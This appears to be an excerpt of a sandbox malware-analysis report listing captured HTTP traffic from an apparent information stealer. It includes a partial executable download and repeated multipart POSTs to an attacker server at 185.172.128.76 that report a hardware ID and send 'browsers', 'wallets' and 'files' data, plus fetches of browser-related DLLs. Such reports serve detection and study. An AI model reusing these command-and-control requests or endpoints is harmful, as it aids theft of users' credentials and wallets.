00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Thu, 25 Apr 2024 07:04:34 GMTServer: Apache/2.4.52 (Ubuntu)Last-Modified: Wed, 24 Apr 2024 21:15:46 GMTETag: "85400-616de2c892480"Accept-Ranges: bytesContent-Length: 545792Content-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 63 08 c4 c7 27 69 aa 94 27 69 aa 94 27 69 aa 94 93 f5 5b 94 37 69 aa 94 93 f5 59 94 a0 69 aa 94 93 f5 58 94 38 69 aa 94 1c 37 a9 95 33 69 aa 94 1c 37 af 95 14 69 aa 94 1c 37 ae 95 05 69 aa 94 2e 11 39 94 22 69 aa 94 27 69 ab 94 7d 69 aa 94 8d 37 a3 95 25 69 aa 94 8d 37 55 94 26 69 aa 94 27 69 3d 94 26 69 aa 94 8d 37 a8 95 26 69 aa 94 52 69 63 68 27 69 aa 94 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 82 76 29 66 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 00 00 b0 06 00 00 b4 01 00 00 00 00 00 b6 80 05 00 00 10 00 00 00 c0 06 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 b0 08 00 00 04 00 00 00 00 00 00 02 00 40 81 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 50 9c 07 00 28 00 00 00 00 f0 07 00 40 28 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 08 00 6c 80 00 00 b0 80 07 00 70 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 81 07 00 40 00 00 00 00 00 00 00 00 00 00 00 00 c0 06 00 1c 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 31 af 06 00 00 10 00 00 00 b0 06 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 aa e2 00 00 00 c0 06 00 00 e4 00 00 00 b4 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 40 20 00 00 00 b0 07 00 00 0e 00 00 00 98 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 67 66 69 64 73 00 00 f8 01 00 00 00 e0 07 00 00 02 00 00 00 a6 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 40 28 00 00 00 f0 07 00 00 2a 00 00 00 a8 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 6c 80 00 00 00 20 08 00 00 82 00 00 00 d2 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
                                Source: global trafficHTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----IJKJDAFHJDHIEBGCFIDBHost: 185.172.128.76Content-Length: 216Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 49 4a 4b 4a 44 41 46 48 4a 44 48 49 45 42 47 43 46 49 44 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 37 39 38 37 35 41 31 36 36 42 41 31 31 37 32 30 30 30 39 33 36 39 0d 0a 2d 2d 2d 2d 2d 2d 49 4a 4b 4a 44 41 46 48 4a 44 48 49 45 42 47 43 46 49 44 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 65 66 61 75 6c 74 31 30 0d 0a 2d 2d 2d 2d 2d 2d 49 4a 4b 4a 44 41 46 48 4a 44 48 49 45 42 47 43 46 49 44 42 2d 2d 0d 0a Data Ascii: ------IJKJDAFHJDHIEBGCFIDBContent-Disposition: form-data; name="hwid"79875A166BA11720009369------IJKJDAFHJDHIEBGCFIDBContent-Disposition: form-data; name="build"default10------IJKJDAFHJDHIEBGCFIDB--
                                Source: global trafficHTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----GDHIIDAFIDGCFHJJDGDAHost: 185.172.128.76Content-Length: 268Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 47 44 48 49 49 44 41 46 49 44 47 43 46 48 4a 4a 44 47 44 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 31 63 32 35 37 39 32 30 33 36 65 38 36 38 61 33 38 33 37 61 62 33 64 30 65 35 38 30 38 32 38 34 32 61 38 37 39 66 34 63 36 31 61 36 33 39 63 31 65 63 35 66 64 66 34 31 37 38 66 61 36 34 38 64 66 37 39 37 35 34 39 36 0d 0a 2d 2d 2d 2d 2d 2d 47 44 48 49 49 44 41 46 49 44 47 43 46 48 4a 4a 44 47 44 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 62 72 6f 77 73 65 72 73 0d 0a 2d 2d 2d 2d 2d 2d 47 44 48 49 49 44 41 46 49 44 47 43 46 48 4a 4a 44 47 44 41 2d 2d 0d 0a Data Ascii: ------GDHIIDAFIDGCFHJJDGDAContent-Disposition: form-data; name="token"1c25792036e868a3837ab3d0e58082842a879f4c61a639c1ec5fdf4178fa648df7975496------GDHIIDAFIDGCFHJJDGDAContent-Disposition: form-data; name="message"browsers------GDHIIDAFIDGCFHJJDGDA--
                                Source: global trafficHTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----GIJJKKJJDAAAAAKFHJJDHost: 185.172.128.76Content-Length: 267Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 47 49 4a 4a 4b 4b 4a 4a 44 41 41 41 41 41 4b 46 48 4a 4a 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 31 63 32 35 37 39 32 30 33 36 65 38 36 38 61 33 38 33 37 61 62 33 64 30 65 35 38 30 38 32 38 34 32 61 38 37 39 66 34 63 36 31 61 36 33 39 63 31 65 63 35 66 64 66 34 31 37 38 66 61 36 34 38 64 66 37 39 37 35 34 39 36 0d 0a 2d 2d 2d 2d 2d 2d 47 49 4a 4a 4b 4b 4a 4a 44 41 41 41 41 41 4b 46 48 4a 4a 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 70 6c 75 67 69 6e 73 0d 0a 2d 2d 2d 2d 2d 2d 47 49 4a 4a 4b 4b 4a 4a 44 41 41 41 41 41 4b 46 48 4a 4a 44 2d 2d 0d 0a Data Ascii: ------GIJJKKJJDAAAAAKFHJJDContent-Disposition: form-data; name="token"1c25792036e868a3837ab3d0e58082842a879f4c61a639c1ec5fdf4178fa648df7975496------GIJJKKJJDAAAAAKFHJJDContent-Disposition: form-data; name="message"plugins------GIJJKKJJDAAAAAKFHJJD--
                                Source: global trafficHTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----JDAFHCGIJECFHIDGDBKEHost: 185.172.128.76Content-Length: 6183Connection: Keep-AliveCache-Control: no-cache
                                Source: global trafficHTTP traffic detected: GET /15f649199f40275b/sqlite3.dll HTTP/1.1Host: 185.172.128.76Cache-Control: no-cache
                                Source: global trafficHTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----IIJDBGDGCGDAKFIDGIDBHost: 185.172.128.76Content-Length: 4599Connection: Keep-AliveCache-Control: no-cache
                                Source: global trafficHTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----KJDGDBFBGIDGIEBGHCGIHost: 185.172.128.76Content-Length: 1451Connection: Keep-AliveCache-Control: no-cache
                                Source: global trafficHTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----DAKEBAKFHCFHIEBFBAFBHost: 185.172.128.76Content-Length: 359Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 44 41 4b 45 42 41 4b 46 48 43 46 48 49 45 42 46 42 41 46 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 31 63 32 35 37 39 32 30 33 36 65 38 36 38 61 33 38 33 37 61 62 33 64 30 65 35 38 30 38 32 38 34 32 61 38 37 39 66 34 63 36 31 61 36 33 39 63 31 65 63 35 66 64 66 34 31 37 38 66 61 36 34 38 64 66 37 39 37 35 34 39 36 0d 0a 2d 2d 2d 2d 2d 2d 44 41 4b 45 42 41 4b 46 48 43 46 48 49 45 42 46 42 41 46 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 5a 58 49 30 61 44 52 6c 4f 48 49 30 4c 6d 5a 70 62 47 55 3d 0d 0a 2d 2d 2d 2d 2d 2d 44 41 4b 45 42 41 4b 46 48 43 46 48 49 45 42 46 42 41 46 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 44 41 4b 45 42 41 4b 46 48 43 46 48 49 45 42 46 42 41 46 42 2d 2d 0d 0a Data Ascii: ------DAKEBAKFHCFHIEBFBAFBContent-Disposition: form-data; name="token"1c25792036e868a3837ab3d0e58082842a879f4c61a639c1ec5fdf4178fa648df7975496------DAKEBAKFHCFHIEBFBAFBContent-Disposition: form-data; name="file_name"ZXI0aDRlOHI0LmZpbGU=------DAKEBAKFHCFHIEBFBAFBContent-Disposition: form-data; name="file"------DAKEBAKFHCFHIEBFBAFB--
                                Source: global trafficHTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----KJDGDBFBGIDGIEBGHCGIHost: 185.172.128.76Content-Length: 359Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 4b 4a 44 47 44 42 46 42 47 49 44 47 49 45 42 47 48 43 47 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 31 63 32 35 37 39 32 30 33 36 65 38 36 38 61 33 38 33 37 61 62 33 64 30 65 35 38 30 38 32 38 34 32 61 38 37 39 66 34 63 36 31 61 36 33 39 63 31 65 63 35 66 64 66 34 31 37 38 66 61 36 34 38 64 66 37 39 37 35 34 39 36 0d 0a 2d 2d 2d 2d 2d 2d 4b 4a 44 47 44 42 46 42 47 49 44 47 49 45 42 47 48 43 47 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 5a 58 49 30 61 44 52 6c 4f 48 49 30 4c 6d 5a 70 62 47 55 3d 0d 0a 2d 2d 2d 2d 2d 2d 4b 4a 44 47 44 42 46 42 47 49 44 47 49 45 42 47 48 43 47 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 4b 4a 44 47 44 42 46 42 47 49 44 47 49 45 42 47 48 43 47 49 2d 2d 0d 0a Data Ascii: ------KJDGDBFBGIDGIEBGHCGIContent-Disposition: form-data; name="token"1c25792036e868a3837ab3d0e58082842a879f4c61a639c1ec5fdf4178fa648df7975496------KJDGDBFBGIDGIEBGHCGIContent-Disposition: form-data; name="file_name"ZXI0aDRlOHI0LmZpbGU=------KJDGDBFBGIDGIEBGHCGIContent-Disposition: form-data; name="file"------KJDGDBFBGIDGIEBGHCGI--
                                Source: global trafficHTTP traffic detected: GET /15f649199f40275b/freebl3.dll HTTP/1.1Host: 185.172.128.76Cache-Control: no-cache
                                Source: global trafficHTTP traffic detected: GET /15f649199f40275b/mozglue.dll HTTP/1.1Host: 185.172.128.76Cache-Control: no-cache
                                Source: global trafficHTTP traffic detected: GET /15f649199f40275b/msvcp140.dll HTTP/1.1Host: 185.172.128.76Cache-Control: no-cache
                                Source: global trafficHTTP traffic detected: GET /15f649199f40275b/nss3.dll HTTP/1.1Host: 185.172.128.76Cache-Control: no-cache
                                Source: global trafficHTTP traffic detected: GET /15f649199f40275b/softokn3.dll HTTP/1.1Host: 185.172.128.76Cache-Control: no-cache
                                Source: global trafficHTTP traffic detected: GET /15f649199f40275b/vcruntime140.dll HTTP/1.1Host: 185.172.128.76Cache-Control: no-cache
                                Source: global trafficHTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----CFCBFHJECAKEHIECGIEBHost: 185.172.128.76Content-Length: 1067Connection: Keep-AliveCache-Control: no-cache
                                Source: global trafficHTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----KJDHCAFCGDAAKEBFIJDGHost: 185.172.128.76Content-Length: 267Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 4b 4a 44 48 43 41 46 43 47 44 41 41 4b 45 42 46 49 4a 44 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 31 63 32 35 37 39 32 30 33 36 65 38 36 38 61 33 38 33 37 61 62 33 64 30 65 35 38 30 38 32 38 34 32 61 38 37 39 66 34 63 36 31 61 36 33 39 63 31 65 63 35 66 64 66 34 31 37 38 66 61 36 34 38 64 66 37 39 37 35 34 39 36 0d 0a 2d 2d 2d 2d 2d 2d 4b 4a 44 48 43 41 46 43 47 44 41 41 4b 45 42 46 49 4a 44 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 77 61 6c 6c 65 74 73 0d 0a 2d 2d 2d 2d 2d 2d 4b 4a 44 48 43 41 46 43 47 44 41 41 4b 45 42 46 49 4a 44 47 2d 2d 0d 0a Data Ascii: ------KJDHCAFCGDAAKEBFIJDGContent-Disposition: form-data; name="token"1c25792036e868a3837ab3d0e58082842a879f4c61a639c1ec5fdf4178fa648df7975496------KJDHCAFCGDAAKEBFIJDGContent-Disposition: form-data; name="message"wallets------KJDHCAFCGDAAKEBFIJDG--
                                Source: global trafficHTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----AFCFHJJECAEHJJKEHIDBHost: 185.172.128.76Content-Length: 265Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 41 46 43 46 48 4a 4a 45 43 41 45 48 4a 4a 4b 45 48 49 44 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 31 63 32 35 37 39 32 30 33 36 65 38 36 38 61 33 38 33 37 61 62 33 64 30 65 35 38 30 38 32 38 34 32 61 38 37 39 66 34 63 36 31 61 36 33 39 63 31 65 63 35 66 64 66 34 31 37 38 66 61 36 34 38 64 66 37 39 37 35 34 39 36 0d 0a 2d 2d 2d 2d 2d 2d 41 46 43 46 48 4a 4a 45 43 41 45 48 4a 4a 4b 45 48 49 44 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 66 69 6c 65 73 0d 0a 2d 2d 2d 2d 2d 2d 41 46 43 46 48 4a 4a 45 43 41 45 48 4a 4a 4b 45 48 49 44 42 2d 2d 0d 0a Data Ascii: ------AFCFHJJECAEHJJKEHIDBContent-Disposition: form-data; name="token"1c25792036e868a3837ab3d0e58082842a879f4c61a639c1ec5fdf4178fa648df7975496------AFCFHJJECAEHJJKEHIDBContent-Disposition: form-data; name="message"files------AFCFHJJECAEHJJKEHIDB--
                                Source: global trafficHTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----AAFIIJDAAAAKFHIDAAAKHost: 185.172.128.76Content-Length: 1759Connection: Keep-AliveCache-Control: no-cache
                                Source: global trafficHTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----DHJEBGIEBFIJKEBFBFHIHost: 185.172.128.76Content-Length: 1743Connection: Keep-AliveCache-Control: no-cache
                                Source: global trafficHTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----AFBFHDBKJEGHJJJKFIIJHost: 185.172.128.76Content-Length: 1759Connection: Keep-AliveCache-Control: no-cache
                                Source: global trafficHTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----BGCAFHCAKFBFIECAFIIJHost: 185.172.128.76Content-Length: 1743Connection: Keep-AliveCache-Control: no-cache
                                Source: global trafficHTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----FIIECFHDBAAECAAKFHDHHost: 185.172.128.76Content-Length: 1759Connection: Keep-AliveCache-Control: no-cache
                                Source: global trafficHTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----EGIDAAFIEHIEHJKFHCAEHost: 185.172.128.76Content-Length: 1743Connection: Keep-AliveCache-Control: no-cache
                                Source: global trafficHTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----DAKEBAKFHCFHIEBFBAFBHost: 185.172.128.76Content-Length: 1759Connection: Keep-AliveCache-Control: no-cache
                                Source: global trafficHTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----CAFIEBKKJJDAKFHIDBFHHost: 185.172.128.76Content-Length: 1743Connection: Keep-AliveCache-Control: no-cache
                                Source: global trafficHTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----CAAKKFHCFIECAAAKEGCFHost: 185.172.128.76Content-Length: 1759Connection: Keep-AliveCache-Control: no-cache
                                Source: global trafficHTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----DHJEBGIEBFIJKEBFBFHIHost: 185.172.128.76Content-Length: 1743Connection: Keep-AliveCache-Control: no-cache
                                Source: global trafficHTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----GHJEGCAEGIIIDHIEBKEBHost: 185.172.128.76Content-Length: 1759Connection: Keep-AliveCache-Control: no-cache
                                Source: global trafficHTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----GIJJKKJJDAAAAAKFHJJDHost: 185.172.128.76Content-Length: 1743Connection: Keep-AliveCache-Control: no-cache
                                Source: global trafficHTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----JJECGCBGDBKJJKEBFBFHHost: 185.172.128.76Content-Length: 1759Connection: Keep-AliveCache-Control: no-cache
                                Source: global trafficHTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----CAAKKFHCFIECAAAKEGCFHost: 185.172.128.76Content-Length: 1743Connection: Keep-AliveCache-Control: no-cache
                                Source: global trafficHTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----EHJKFCGHIDHCBGDHJKEBHost: 185.172.128.76Content-Length: 1759Connection: Keep-AliveCache-Control: no-cache
                                Source: global trafficHTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----HDAKJDHIEBFIIDGDGDBAHost: 185.172.128.76Content-Length: 1743Connection: Keep-AliveCache-Control: no-cache
                                Source: global trafficHTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----FIECBFIDGDAKFHIEHJKFHost: 185.172.128.76Content-Length: 1759Connection: Keep-AliveCache-Control: no-cache
                                Source: global trafficHTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----BGHIDGCAFCBAAAAAFHDAHost: 185.172.128.76Content-Length: 1743Connection: Keep-AliveCache-Control: no-cache
                                Source: global trafficHTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----AKJDGDGDHDGDBFIDHDBAHost: 185.172.128.76Content-Length: 1759Connection: Keep-AliveCache-Control: no-cache
                                Source: global trafficHTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----DAFHIDGIJKJKECBGDBGHHost: 185.172.128.76Content-Length: 1743Connection: Keep-AliveCache-Control: no-cache
                                Source: global trafficHTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----FCBAECGIEBKKFHIDAKECHost: 185.172.128.76Content-Length: 1759Connection: Keep-AliveCache-Control: no-cache
                                Source: global trafficHTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----JKJDAEBFCBKECBGDBFCFHost: 185.172.128.76Content-Length: 1743Connection: Keep-AliveCache-Control: no-cache
                                Source: global trafficHTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----BAAAAKJKJEBGHJKFHIDGHost: 185.172.128.76Content-Length: 1759Connection: Keep-AliveCache-Control: no-cache
                                Source: global trafficHTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----BKKJKFBKKECFHJKEBKEHHost: 185.172.128.76Content-Length: 1743Connection: Keep-AliveCache-Control: no-cache
                                Source: global trafficHTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----GDHIIDAFIDGCFHJJDGDAHost: 185.172.128.76Content-Length: 1743Connection: Keep-AliveCache-Control: no-cache
                                Source: global trafficHTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----BGCAFHCAKFBFIECAFIIJHost: 185.172.128.76Content-Length: 1743Connection: Keep-AliveCache-Control: no-cache
                                Source: global trafficHTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----IEHJDGIDBAAFIDGCGCAKHost: 185.172.128.76Content-Length: 1743Connection: Keep-AliveCache-Control: no-cache
                                Source: global trafficHTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----BAAAAKJKJEBGHJKFHIDGHost: 185.172.128.76Content-Length: 1743Connection: Keep-AliveCache-Control: no-cache
                                Source: global trafficHTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----HDGCAAFBFBKFIDGDHJDBHost: 185.172.128.76Content-Length: 1743Connection: Keep-AliveCache-Control: no-cache
                                Source: global trafficHTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----FIIDBKJJDGHDHJKEHJDBHost: 185.172.128.76Content-Length: 1743Connection: Keep-AliveCache-Control: no-cache
                                Source: global trafficHTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----ECFHIJKJKFIDHJKFBGHCHost: 185.172.128.76Content-Length: 1743Connection: Keep-AliveCache-Control: no-cache
                                Source: global trafficHTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----GCGHCBKFCFBFHIDHDBFCHost: 185.172.128.76Content-Length: 1743Connection: Keep-AliveCache-Control: no-cache
                                Source: global trafficHTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----JJECGCBGDBKJJKEBFBFHHost: 185.172.128.76Content-Length: 1743Connection: Keep-AliveCache-Control: no-cache
                                Source: global trafficHTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----GCBGCAFIIECBFIDHIJKFHost: 185.172.128.76Content-Length: 1743Connection: Keep-AliveCache-Control: no-cache
                                Source: global trafficHTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----IDGIJEGHDAECAKECAFCAHost: 185.172.128.76Content-Length: 1743Connection: Keep-AliveCache-Control: no-cache
                                Source: global trafficHTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----GDHIDHIEGIIIECAKEBFBHost: 185.172.128.76Content-Length: 1743Connection: Keep-AliveCache-Control: no-cache
